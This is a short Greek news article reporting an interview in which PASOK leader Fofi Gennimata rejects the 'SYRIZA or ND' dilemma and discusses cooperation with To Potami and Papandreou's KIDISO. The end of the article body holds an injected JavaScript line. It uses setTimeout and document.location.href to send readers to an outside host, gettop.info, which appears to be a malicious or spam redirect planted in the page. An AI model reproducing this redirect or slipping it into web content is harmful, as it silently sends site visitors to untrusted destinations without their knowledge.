Γεννηματά: Δεν χαρίζω τον χώρο στον Τσίπρα

0
12

 

Σε συνέντευξή της στην εφημερίδα «Παραπολιτικά» υπό τον τίτλο «Δεν χαρίζω τον χώρο στον Τσίπρα», η πρόεδρος του ΠΑΣΟΚ και επικεφαλής της Δημοκρατικής Συμπαράταξης, Φώφη Γεννηματά σημειωνει πως «η χώρα χρειάζεται αλλαγή κυβέρνησης και αλλαγή πολιτικής και αυτό μπορεί να γίνει μόνο με αλλαγή των πολιτικών συσχετισμών και την καθοριστική εκλογική ενίσχυση της Δημοκρατικής Συμπαράταξης«.

«Μια ισχυρή Δημοκρατική Συμπαράταξη θα μπορέσει να επιβάλει την αναγκαία εθνική συνεννόηση και το σχηματισμό μιας σταθερής κυβέρνησης ευρείας στήριξης. Η χώρα χρειάζεται μια προοδευτική εναλλακτική πρόταση διακυβέρνησης και μια νέα κοινωνική συμφωνία«, υποστηρίζει η κ. Γεννηματά και προσθέτει: «Η διακριτική, αυτόνομη πορεία που ακολουθούμε αυτόν τον στόχο υπηρετεί. Δεν «τσιμπάμε» στο ψεύτικο δίλημμα «ΣΥΡΙΖΑ ή ΝΔ». Το «φύγε εσύ να έρθω εγώ» δεν δίνει λύσεις. Αρκετά κόστισε στη χώρα και στον λαό μας«.

Όσον αφορά στη συνεργασία με το Ποτάμι σημειώνει ότι «δεν έχει νόημα η ανακύκλωση αυτής της συζήτησης. Έχει κουράσει πλέον τον κόσμο», ενώ για τη συνεργασία με το ΚΙΔΗΣΟ του Γ. Παπανδρέου δηλώνει ότι: «Προχωράμε με όχημα τη Δημοκρατική Συμπαράταξη. Έχουμε θέσει το πλαίσιο της αυτόνομης πορείας. Τέρμα οι επιτροπές, τα φόρα, η εσωστρέφεια και οι ομφαλοσκοπήσεις» και ξεκαθαρίζει ότι: «Όποιος αποδέχεται αυτό το πλαίσιο και κινείται ιδεολογικά στο χώρο της Κεντροαριστεράς είναι καλοδεχούμενος με ίσους όρους». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here